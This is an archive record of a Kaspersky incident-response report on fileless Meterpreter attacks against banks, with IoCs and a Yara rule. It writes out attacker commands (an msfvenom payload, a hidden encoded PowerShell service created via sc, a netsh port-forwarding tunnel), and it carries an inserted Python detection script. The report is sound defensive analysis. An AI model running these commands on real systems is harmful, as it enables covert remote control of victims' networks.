{
	"id": "79a368b6-396a-4ea9-89f1-adf01dce9178",
	"created_at": "2026-04-06T01:28:58.389113Z",
	"updated_at": "2026-04-10T03:35:16.931026Z",
	"deleted_at": null,
	"sha1_hash": "caea65bb7f902811d98ae257c767274fee58b95a",
	"title": "Fileless attacks against enterprise networks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 754996,
	"plain_text": "Fileless attacks against enterprise networks\r\nBy GReAT\r\nPublished: 2017-02-08 · Archived: 2026-04-06 00:46:50 UTC\r\nDuring incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memory and hard drives. Unfortunately, each of these storage media has a limited timeframe during which the required data is available. One reboot of an attacked computer makes memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of the needed data and, depending on disk activity, forensic specialists may extract data up to a year after an incident. That is why attackers use anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity from data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package, it removes the package from the hard drive by renaming the file and leaves part of itself in memory together with a payload. That is why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that attackers install in the network. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that; Duqu2 used a special driver. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling had been implemented by attackers using the standard Windows utilities SC and NETSH.\r\nDescription\r\nThis threat was originally discovered by a bank's security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab's product detection names for such kinds of threat are MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally it was discovered that the NETSH utility was used for tunnelling traffic from the victim's host to the attacker's C2.\r\nWe know that the Metasploit framework was used to generate the script found in the registry (reproduced as an image in the original report). This script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM. Such scripts can be generated with the Metasploit msfvenom utility using the following command line options:\r\nmsfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd\r\nAfter the successful generation of a script, the attackers used the SC utility to install a malicious service (which executes the previous script) on the target host. This can be done, for example, using the following command:\r\nsc \\\\target_name create ATITscUA binpath= \"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQA…\" start= manual\r\nThe next step after installing the malicious service is to set up tunnels to access the infected machine from remote hosts, for example using the following command:\r\nnetsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0\r\nThat results in all traffic arriving on port 4444 of the host where the rule is created (10.10.1.11 in this case) being forwarded to 10.10.1.12:8080. 
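The registry artefacts these two commands create, as an added example that is not part of the Securelist report: the Python below builds a constructed service ImagePath and PortProxy value in the shape SC and NETSH write them, decodes the -e argument (base64 over UTF-16LE, which is why the blob in the sc command starts with aQBm…) and flags the hidden PowerShell service and the tunnel. Sample values, the two-switch threshold and the helper names are assumptions for illustration; the registry key is the one named in Appendix I.

```python
import base64
import re

# Added example, not code from the Securelist report. Registry values are
# constructed to mirror the 'sc create' and 'netsh portproxy' commands above.
SEP = chr(92)   # backslash, built this way so the snippet pastes cleanly
PORTPROXY_KEY = SEP.join(
    ['HKLM', 'SYSTEM', 'ControlSet001', 'services', 'PortProxy', 'v4tov4', 'tcp'])

# -e / -enc / -EncodedCommand followed by its base64 argument
ENCODED_CMD_RE = re.compile(
    r'(?i)(?:^|[ ])-e(?:nc|ncodedcommand)?[ ]+([A-Za-z0-9+/=]+)')
# switches the psh-cmd stub relies on; two or more is a strong signal (assumed threshold)
HIDDEN_SWITCHES = ('-nop', '-w hidden', '-noni', '-ep bypass')


def encode_powershell(script):
    # PowerShell -EncodedCommand takes base64 of UTF-16LE text; the interleaved
    # NUL bytes are what produce the 'A' every fourth character in the blob.
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


def decode_encoded_command(image_path):
    # Returns the decoded script, or None when no encoded command is present.
    m = ENCODED_CMD_RE.search(image_path)
    if not m:
        return None
    blob = m.group(1)
    blob += '=' * (-len(blob) % 4)   # tolerate padding stripped by a copy-paste
    try:
        return base64.b64decode(blob).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def service_is_suspicious(image_path):
    # Hidden PowerShell launched from a service binPath, as in the sc create above.
    low = image_path.lower()
    if 'powershell' not in low:
        return False
    hits = sum(1 for switch in HIDDEN_SWITCHES if switch in low)
    return hits >= 2 or decode_encoded_command(image_path) is not None


def parse_portproxy(values):
    # NETSH stores each rule under PORTPROXY_KEY as a value whose name is
    # listenaddress/listenport and whose data is connectaddress/connectport.
    tunnels = []
    for name, data in values.items():
        laddr, lport = name.rsplit('/', 1)
        caddr, cport = data.rsplit('/', 1)
        tunnels.append({'listen': (laddr, int(lport)),
                        'connect': (caddr, int(cport))})
    return tunnels


def triage(image_path, portproxy_values):
    # Walks both locations the way the IoC appendix suggests and reports findings.
    findings = []
    if service_is_suspicious(image_path):
        script = decode_encoded_command(image_path) or '<not base64>'
        findings.append('hidden PowerShell service, decoded: ' + script)
    for t in parse_portproxy(portproxy_values):
        findings.append('portproxy %s:%d -> %s:%d' % (t['listen'] + t['connect']))
    return findings


# Constructed sample data (hypothetical; the real msfvenom stub is much longer).
SAMPLE_SCRIPT = 'if([IntPtr]::Size -eq 4){$x=1}else{$x=2};IEX $stage'
SAMPLE_IMAGE_PATH = (SEP.join(['C:', 'Windows', 'system32', 'cmd.exe'])
                     + ' /b /c start /b /min powershell.exe -nop -w hidden -e '
                     + encode_powershell(SAMPLE_SCRIPT))
SAMPLE_PORTPROXY = {'0.0.0.0/4444': '10.10.1.12/8080'}

if __name__ == '__main__':
    for line in triage(SAMPLE_IMAGE_PATH, SAMPLE_PORTPROXY):
        print(line)
```

The same decode step explains the blob in the sc command: aQBmACgAWwBJAG4AdABQAHQA is the base64 of UTF-16LE 'if([IntPt', the opening of the msfvenom psh-cmd stub ('if([IntPtr]::Size -eq 4)'). Run against a real system the ImagePath values come from the services key and the tunnel values from PORTPROXY_KEY; the hive must be read offline or via the registry API, which this stand-alone snippet does not do.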
This technique of setting up proxy tunnels provides the attackers with the ability to control any PowerShell-infected host from remote Internet hosts.\r\nThe use of the SC and NETSH utilities requires administrator privileges on both the local and the remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to achieve this, the attackers used credentials of service accounts with administrative privileges (for example backup, remote task scheduler service, etc.) grabbed with Mimikatz.\r\nFeatures\r\nThe analysis of memory dumps and Windows registries from affected machines allowed us to restore both Meterpreter and Mimikatz. These tools were used to collect passwords of system administrators and for the remote administration of infected hosts.\r\nIn order to extract the PowerShell payload used by the attackers from the memory dumps, we used the following BASH commands (each stage strips one layer of the psh-cmd wrapper: the base64 of the outer encoded command, the base64 of the gzip-compressed inner script, the gzip layer, and finally the base64 of the shellcode):\r\ncat mal_powershell.ps1_4 | cut -f12 -d' ' | base64 -di | cut -f8 -d\"'\" | base64 -di | zcat - | cut -f2 -d'(' | cut -f2 -d'\"' | less | grep / | base64 -di | hd\r\nResulting in the following payload:\r\n[Figure: part of the code responsible for downloading Meterpreter from \"adobeupdates.sytes[.]net\"]\r\nVictims\r\nUsing the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and HEUR:Trojan.Multi.Powecod.a. The table in the original report shows the number of infections per country. However, we cannot confirm that all of them were infected by the same attacker.\r\nAttribution\r\nDuring our analysis of the affected bank we learned that the attackers had used several third-level domains and domains in the .GA, .ML and .CF ccTLDs. The trick of using such domains is that they are free and lack WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, attribution is almost impossible. The closest groups with the same TTPs are GCMAN and Carbanak.\r\nConclusions\r\nTechniques like those described in this report are becoming more common, especially against relevant targets in the banking industry. Unfortunately, the use of common tools combined with different tricks makes detection very hard.\r\nIn fact, detection of this attack is possible only in RAM, on the network and in the registry. Please check the Appendix I – Indicators of Compromise section for more details on how to detect malicious activity related to this fileless PowerShell attack.\r\nAfter successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no malware samples are needed for successful exfiltration from a network, and how standard and open-source utilities make attribution almost impossible.\r\nFurther details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on St. Maarten from 2 to 6 April, 2017.\r\nMore information about this attack is available to customers of Kaspersky APT Intelligence Services. For a subscription inquiry, contact: intelreports (at) kaspersky [dot] com.\r\nAppendix I – Indicators of Compromise\r\nTo find the host used by an attacker using the described technique for remote connections and password collection, the following paths in the Windows registry should be analyzed:\r\nHKLM\\SYSTEM\\ControlSet001\\services – this path is modified when the SC utility creates a service\r\nHKLM\\SYSTEM\\ControlSet001\\services\\PortProxy\\v4tov4\\tcp – this path is modified when the NETSH utility adds a portproxy rule\r\nIn unallocated space in the Windows registry, the following artefacts might be found:\r\npowershell.exe -nop -w hidden -e\r\n10.10.1.12/8080\r\n10.10.1.11/4444\r\nPlease note that these IPs are taken from the IR case in which we participated, so any other IP could be used by a given attacker. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of the NETSH utility for building tunnels.\r\nVerdicts:\r\nMEM:Trojan.Win32.Cometer\r\nMEM:Trojan.Win32.Metasploit\r\nTrojan.Multi.GenAutorunReg.c\r\nHEUR:Trojan.Multi.Powecod\r\nAppendix II – Yara Rules\r\nrule msf_or_tunnel_in_registry\r\n{\r\n    strings:\r\n        $port_number_in_registry = \"/4444\"\r\n        $hidden_powershell_in_registry = \"powershell.exe -nop -w hidden\" wide\r\n    condition:\r\n        // 0x66676572 is the little-endian 'regf' magic: only registry hive files are scanned\r\n        uint32(0)==0x66676572 and any of them\r\n}\r\nSource: https://securelist.com/fileless-attacks-against-enterprise-networks/77403/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securelist.com/fileless-attacks-against-enterprise-networks/77403/"
	],
	"report_names": [
		"77403"
	],
	"threat_actors": [
		{
			"id": "c9617bb6-45c8-495e-9759-2177e61a8e91",
			"created_at": "2022-10-25T15:50:23.405039Z",
			"updated_at": "2026-04-10T02:00:05.387643Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Carbanak",
				"Anunak"
			],
			"source_name": "MITRE:Carbanak",
			"tools": [
				"Carbanak",
				"Mimikatz",
				"PsExec",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3b185161-668f-4cac-b930-9482f9706848",
			"created_at": "2022-10-25T16:07:23.670892Z",
			"updated_at": "2026-04-10T02:00:04.706866Z",
			"deleted_at": null,
			"main_name": "GCMAN",
			"aliases": [
				"G0036"
			],
			"source_name": "ETDA:GCMAN",
			"tools": [
				"GCMAN",
				"Meterpreter",
				"VNC",
				"Virtual Network Computing"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1e408839-27ce-4f52-b7c6-d0a700e54027",
			"created_at": "2023-01-06T13:46:38.479274Z",
			"updated_at": "2026-04-10T02:00:02.991414Z",
			"deleted_at": null,
			"main_name": "GCMAN",
			"aliases": [
				"G0036"
			],
			"source_name": "MISPGALAXY:GCMAN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf",
			"created_at": "2023-01-06T13:46:38.405479Z",
			"updated_at": "2026-04-10T02:00:02.961112Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"ATK32",
				"G0046",
				"G0008",
				"Sangria Tempest",
				"ELBRUS",
				"GOLD NIAGARA",
				"Coreid",
				"Carbanak",
				"Carbon Spider",
				"JokerStash",
				"CARBON SPIDER"
			],
			"source_name": "MISPGALAXY:FIN7",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ed3810b7-141a-4ed0-8a01-6a972b80458d",
			"created_at": "2022-10-25T16:07:23.443259Z",
			"updated_at": "2026-04-10T02:00:04.602946Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider",
				"ELBRUS",
				"G0008",
				"Gold Waterfall",
				"Sangria Tempest"
			],
			"source_name": "ETDA:Carbanak",
			"tools": [
				"AVE_MARIA",
				"Agentemis",
				"AmmyyRAT",
				"Antak",
				"Anunak",
				"Ave Maria",
				"AveMariaRAT",
				"BABYMETAL",
				"BIRDDOG",
				"Backdoor Batel",
				"Batel",
				"Bateleur",
				"BlackMatter",
				"Boostwrite",
				"Cain \u0026 Abel",
				"Carbanak",
				"Cl0p",
				"Cobalt Strike",
				"CobaltStrike",
				"DNSMessenger",
				"DNSRat",
				"DNSbot",
				"DRIFTPIN",
				"DarkSide",
				"FOXGRABBER",
				"FlawedAmmyy",
				"HALFBAKED",
				"JS Flash",
				"KLRD",
				"MBR Eraser",
				"Mimikatz",
				"Nadrac",
				"Odinaff",
				"POWERPIPE",
				"POWERSOURCE",
				"PsExec",
				"SQLRAT",
				"Sekur",
				"Sekur RAT",
				"SocksBot",
				"SoftPerfect Network Scanner",
				"Spy.Agent.ORM",
				"TEXTMATE",
				"TeamViewer",
				"TiniMet",
				"TinyMet",
				"Toshliph",
				"VB Flash",
				"WARPRISM",
				"avemaria",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fc11deee-6db4-46a9-a3d5-c02bb960cc51",
			"created_at": "2022-10-25T15:50:23.277991Z",
			"updated_at": "2026-04-10T02:00:05.400194Z",
			"deleted_at": null,
			"main_name": "GCMAN",
			"aliases": [
				"GCMAN"
			],
			"source_name": "MITRE:GCMAN",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438938,
	"ts_updated_at": 1775792116,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/caea65bb7f902811d98ae257c767274fee58b95a.pdf",
		"text": "https://archive.orkl.eu/caea65bb7f902811d98ae257c767274fee58b95a.txt",
		"img": "https://archive.orkl.eu/caea65bb7f902811d98ae257c767274fee58b95a.jpg"
	}
}